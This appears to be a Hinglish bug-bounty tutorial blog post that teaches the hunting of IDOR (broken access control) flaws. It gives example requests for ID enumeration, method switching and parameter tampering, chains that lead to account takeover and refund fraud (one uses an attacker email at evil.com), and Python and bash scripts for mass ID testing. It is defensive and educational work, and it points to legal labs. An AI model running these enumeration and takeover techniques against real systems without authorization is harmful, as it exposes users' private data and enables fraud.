Aaj Kya Seekhenge?
- IDOR kya hai bilkul basics se
- Kahan dhundhen input points
- Basic se Advanced IDOR types
- Hidden IDOR techniques elite level
- IDOR chains impact multiply karo
- Automated + Manual testing workflow
- Bug bounty impact maximize karna
Kyun zaroori hai? IDOR sabse underrated aur highest-paying vulnerability hai bug bounty mein! Koi fancy tool nahi chahiye sirf ek number change karo aur doosre user ka data dekho! Simple concept lekin $500 se $10,000+ tak bounty milti hai!
π€ IDOR Kya Hai? Simple Analogy
Socho ek Bank locker system hai:
Normal:
Tum apna locker number 1234 use karte ho
β Sirf tumhara data access hota hai β
IDOR Vulnerability:
Tum locker number 1235 type karo
β Bank ne check hi nahi kiya ki 1235 tumhara hai ya nahi!
β Doosre ka data access ho gaya! π±Website mein yahi hota hai:
Normal Request:
GET /api/user/profile?id=1001
β Tumhara profile aata hai β
IDOR Attack:
GET /api/user/profile?id=1002
β Doosre user ka profile aata hai! π΄
Server ne sirf check kiya:
"Kya user logged in hai?" β
Lekin check nahi kiya:
"Kya yeh user ID 1002 ka data access kar sakta hai?" βYahi hai IDOR Authorization check missing!
IDOR Ke Types
Type 1: Numeric ID IDOR Sabse Common
GET /invoice/download?invoice_id=5001
GET /invoice/download?invoice_id=5002 β Doosre ka invoice!
GET /api/orders?order_id=9871
GET /api/orders?order_id=9872 β Doosre ka order!
GET /profile/view?user_id=1001
GET /profile/view?user_id=1002 β Doosre ka profile!Type 2: GUID/UUID IDOR
GET /api/documents/550e8400-e29b-41d4-a716-446655440000
Yeh random lagta hai β lekin:
β Kisi API response mein doosre users ke GUIDs
expose hote hain!
β Woh GUID use karo β Unka document access!
Example:
GET /api/users β Response mein sabhi users ke UUIDs!
Ab unhe use karo documents access karne ke liye!Type 3: Encoded ID IDOR
Base64 encoded:
GET /api/profile?id=MTAwMQ==
MTAwMQ== decode karo β 1001
Change karo:
1002 β Base64 β MTAwMg==
GET /api/profile?id=MTAwMg==
β User 1002 ka profile! π―
Hashing bhi hoti hai:
MD5(1001) = b8c9d1f2...
MD5(1002) = a7f3e4d1...Type 4: Predictable Filename IDOR
GET /uploads/invoices/invoice_1001.pdf
GET /uploads/invoices/invoice_1002.pdf β Increment karo!
GET /exports/report_2024_user_5001.xlsx
GET /exports/report_2024_user_5002.xlsx β Doosra user!Type 5: HTTP Method IDOR
POST /api/user/1001/delete β 403 Forbidden!
GET /api/user/1001/delete β 200 OK! π±
Method switch karo β Authorization check bypass!Type 6: JSON Parameter IDOR
POST /api/update-profile
{"user_id": 1001, "email": "mine@email.com"}
Change karo:
{"user_id": 1002, "email": "mine@email.com"}
β Doosre user ka email change ho gaya! π΄Type 7: Blind IDOR
Response mein data nahi aata β
lekin action execute hoti hai!
DELETE /api/messages/5001
β Tumhara message delete hua β
DELETE /api/messages/5002
β 200 OK! Doosre ka message delete ho gaya!
β Data nahi mila β lekin action hua! π―PART 2: Kahan Dhundhen IDOR? Input Points
π’ URL Parameters:
/profile?id=
/invoice?ref=
/order?order_id=
/document?doc=
/download?file_id=
π POST Body:
{"user_id": 1001}
{"account_id": "ABC123"}
{"recipient_id": 5}
πͺ Cookies:
user_id=1001
account=5001
session_user=abc123
π HTTP Headers:
X-User-ID: 1001
X-Account: 5001
X-Resource-ID: abc
π Hidden Form Fields:
<input type="hidden" name="user_id" value="1001">
π File Paths:
/files/user_1001/document.pdf
/exports/1001/report.xlsx
π API Endpoints:
/api/v1/users/1001/data
/api/v2/accounts/1001/transactionsPART 3: Elite IDOR Techniques
Technique 1: API Response Mining
# API responses mein doosre users ke IDs dhundho!
# Example:
GET /api/team/members
Response:
{
"members": [
{"id": 1001, "name": "You"},
{"id": 1002, "name": "Alice"}, β Unka ID!
{"id": 1003, "name": "Bob"} β Unka ID!
]
}
# Ab yeh IDs use karo:
GET /api/users/1002/private-data
GET /api/users/1003/invoicesTechnique 2: Account 1 + Account 2 Testing
Elite technique:
Step 1: 2 accounts banao (Account A + Account B)
Step 2: Account A se koi resource create karo
β Resource ID note karo (e.g., invoice_id=5001)
Step 3: Account B se login karo
Step 4: Account A ka resource access karo
GET /api/invoice/5001
β Agar milta hai β IDOR! π―
Yeh sabse clean PoC hota hai β companies ko convince karna easy!Technique 3: Parameter Pollution
Ek parameter ke saath multiple values:
GET /api/profile?user_id=1002&user_id=1001
β Server dono process kare toh?
β Ek authorized, ek unauthorized!
POST /api/data
user_id=1001&user_id=1002
JSON:
{"user_id": [1001, 1002]}
{"user_id": {"id": 1002}}Technique 4: Version Switching
Secure:
GET /api/v2/user/1002/profile β 403
Old version:
GET /api/v1/user/1002/profile β 200! π―
Waybackurls + GAU se old API versions dhundho!Technique 5: Object Type Confusion
Numeric ID hai:
GET /api/document/1001 β Tumhara document
String bhi accept karta hai?
GET /api/document/1001.json β Data in JSON!
GET /api/document/1001.xml β Data in XML!
GET /api/document/1001.csv β Data in CSV!
β Different format = Different access control?Technique 6: Referrer-Based IDOR
Kuch servers Referer header check karte hain:
Request:
GET /api/admin/users/1002
Referer: https://target.com/admin/
β Agar Referer admin URL hai toh access milta hai!
β Authorization properly implement nahi ki!
PART 4: IDOR Chains Impact Multiply Karo!
Single IDOR + Doosra IDOR = Account Takeover!
Chain 1: IDOR β Account Takeover
Step 1: Email change IDOR dhundho
GET /api/user/1002/email-change?new_email=mine@evil.com
β 200 OK!
Step 2: Password reset trigger karo
POST /api/forgot-password
{"email": "mine@evil.com"}
β Reset link tumhare email pe!
Step 3: Account takeover!
β $2,000-$5,000 bounty! π°Chain 2: IDOR β PII Data Exposure
Step 1: User IDs list karo (API response mining)
Step 2: Har ID pe:
GET /api/user/{id}/profile
β Name, Email, Phone, Address, DOB
Step 3: Mass PII exposure = Critical!
β GDPR violation bhi!
β $3,000-$8,000 bounty! π°Chain 3: IDOR β Financial Impact
Step 1: Invoice IDOR
GET /api/invoices/5002 β Doosre ka invoice padhna
Step 2: Payment IDOR
POST /api/payment/refund
{"invoice_id": 5002, "amount": 1000}
β Doosre ke invoice ka refund apne account mein!
Step 3: Financial fraud = Critical!
β $5,000-$15,000 bounty! π°Chain 4: IDOR + Privilege Escalation
Step 1: User ID change karo
GET /api/profile?id=1 (Admin ka ID!)
Step 2: Admin details expose
β Admin email, name, metadata
Step 3: Admin reset trigger
β Combined = Account Takeover on Admin!
β Critical! Maximum bounty!PART 5: Automated IDOR Testing
Burp Suite Autorize Extension
Sabse best tool IDOR ke liye!
Setup:
1. Burp Suite open karo
2. Extensions β BApp Store β "Autorize" install karo
3. Account B ka session cookie add karo
4. Account A se browse karo
5. Autorize automatically test karega:
β Account A ke requests β Account B ke session se replay
β "Bypassed!" = IDOR! π―
Color coding:
π’ Green = Properly protected
π΄ Red = IDOR! Bypassed!
π‘ Yellow = Needs manual reviewBurp Suite Intruder se Mass Testing
1. GET /api/invoice?id=5001 request intercept karo
2. Send to Intruder
3. Β§5001Β§ β ID position mark karo
4. Payload: Numbers (5000-6000)
5. Attack!
6. Response length filter karo:
β Same length = Probably all returning same data
β Different length = Different data = IDOR!Python Script Automated IDOR Check
#!/usr/bin/env python3
# idor_check.py
import requests
import sys
TARGET = "https://target.com/api/invoice"
COOKIES_A = {"session": "YOUR_SESSION_A"}
COOKIES_B = {"session": "YOUR_SESSION_B"}
# Account A ke invoice IDs
A_IDS = [5001, 5002, 5003]
# Account B ke invoice IDs (doosre user ke)
B_IDS = [6001, 6002, 6003]
print("π Testing IDOR...")
for bid in B_IDS:
# Account A se Account B ka data access karo
r = requests.get(
f"{TARGET}?id={bid}",
cookies=COOKIES_A
)
if r.status_code == 200 and len(r.text) > 100:
print(f"π΄ IDOR FOUND! ID: {bid}")
print(f" Status: {r.status_code}")
print(f" Response length: {len(r.text)}")
else:
print(f"β
Protected: ID {bid} β {r.status_code}")PART 6: Complete Elite IDOR Workflow
#!/bin/bash
# idor_hunt.sh
TARGET=$1
DIR="idor_${TARGET}"
mkdir -p $DIR
echo "π IDOR Hunt: $TARGET"
echo "ββββββββββββββββββββββββ"
# Step 1: API endpoints dhundho
echo "π‘ API Endpoints..."
gau $TARGET | grep -iE "/api/|/v1/|/v2/" | \
grep -E "[0-9]+" | \
uro > $DIR/api_endpoints.txt
echo "β
API URLs: $(wc -l < $DIR/api_endpoints.txt)"
# Step 2: Numeric ID patterns
echo "π’ Numeric IDs..."
cat $DIR/api_endpoints.txt | \
grep -oE "[0-9]{3,}" | \
sort -n | uniq > $DIR/ids_found.txt
echo "β
Unique IDs: $(wc -l < $DIR/ids_found.txt)"
# Step 3: Interesting endpoints
echo "π― Interesting Endpoints..."
cat $DIR/api_endpoints.txt | grep -iE \
"profile|account|invoice|order|payment|
document|file|user|report|export|download" \
> $DIR/interesting.txt
echo "β
Interesting: $(wc -l < $DIR/interesting.txt)"
# Step 4: Base64 IDs dhundho
echo "π Encoded IDs..."
cat $DIR/api_endpoints.txt | \
grep -oE "[A-Za-z0-9+/]{20,}={0,2}" | \
while read enc; do
decoded=$(echo "$enc" | base64 -d 2>/dev/null)
if [[ $decoded =~ ^[0-9]+$ ]]; then
echo "Base64 ID found: $enc β $decoded"
fi
done > $DIR/encoded_ids.txt
echo ""
echo "ββββββββββββββββββββββββ"
echo "π IDOR Hunt Summary"
echo "ββββββββββββββββββββββββ"
echo "API Endpoints : $(wc -l < $DIR/api_endpoints.txt)"
echo "Numeric IDs : $(wc -l < $DIR/ids_found.txt)"
echo "Interesting URLs : $(wc -l < $DIR/interesting.txt)"
echo "Results in : $DIR/"
echo "Manual testing : Autorize extension use karo!"IDOR Cheat Sheet Quick Reference
# βββ DETECTION βββββββββββββββββββββββββββ
?id=1001 β 1002 try karo
?invoice=5001 β 5000, 4999, 5002 try karo
?user_id=abc β Doosre users ke IDs
# βββ ENCODING ββββββββββββββββββββββββββββ
Base64: echo "1002" | base64
URL encode: 1002 β %31%30%30%32
Hex: 1002 β 0x3EA
# βββ HTTP METHODS βββββββββββββββββββββββββ
GET β POST β PUT β DELETE β PATCH β HEAD
# βββ PARAMETER LOCATIONS ββββββββββββββββββ
URL params, POST body, JSON, XML,
Cookies, Headers, Hidden fields
# βββ TOOLS ββββββββββββββββββββββββββββββββ
Burp Autorize β Best IDOR automation
Burp Intruder β Mass ID testing
Python scripts β Custom automationAaj Ka Homework
1. DVWA setup check karo
2. OWASP WebGoat mein IDOR lab karo:
docker run -p 8080:8080 webgoat/goat-and-wolf
β localhost:8080/WebGoat
β Access Control β IDOR section
3. Burp Suite mein Autorize install karo:
Extensions β BApp Store β Autorize
4. Do accounts banao kisi test site pe:
crAPI: https://github.com/OWASP/crAPI
docker-compose up -d
β Account A + Account B
β Autorize setup karo
β IDOR dhundho!
5. Comment mein batao:
Pehli IDOR kahan mili? πQuick Revision
π IDOR = Authorization check missing
Doosre ka resource access
π’ Types = Numeric, GUID, Encoded,
Filename, Method, JSON param
π― Find = URL params, POST body,
Cookies, Headers, Hidden fields
π οΈ Tools = Burp Autorize (BEST!), Intruder
βοΈ Chains = IDOR + IDOR = Account Takeover!
π° Impact = PII exposure, Financial fraud,
Account takeover = High/Critical
π§ͺ Test Method = 2 accounts banao β cross access!Meri Baatβ¦
Ek baar maine ek fintech app test kiyaΰ₯€
Normal endpoint:
GET /api/v2/transactions?account_id=ACC001Maine socha yeh encoded lagta haiΰ₯€
Doosre user ka account ID API response se nikala:
{"transfer_to": "ACC002", "name": "John Doe"}Test kiya:
GET /api/v2/transactions?account_id=ACC002Response:
{
"transactions": [
{"amount": 50000, "to": "Amazon"},
{"amount": 120000, "description": "Salary"},
...
],
"balance": 847500
}Poori transaction history aur bank balance doosre user ka!
Aur yeh endpoint authenticated tha lekin authorization check nahi tha!
Bounty: $3,500 High! π
Lesson: Authenticated != Authorized! Yeh fark samjho aur IDOR dhundho!
Agle article mein SSRF Server ko apna agent banao aur internal network explore karo! Cloud environments mein Critical bounties ka khazana! π₯
HackerMD Bug Bounty Hunter | Cybersecurity Researcher GitHub: BotGJ16 | Medium: @HackerMD
Previous: Article #15 SQL Injection Next: Article #17 SSRF: Server Ko Apna Agent Banao!
#IDOR #BrokenAccessControl #BugBounty #WebSecurity #EthicalHacking #Hinglish #OWASP #HackerMD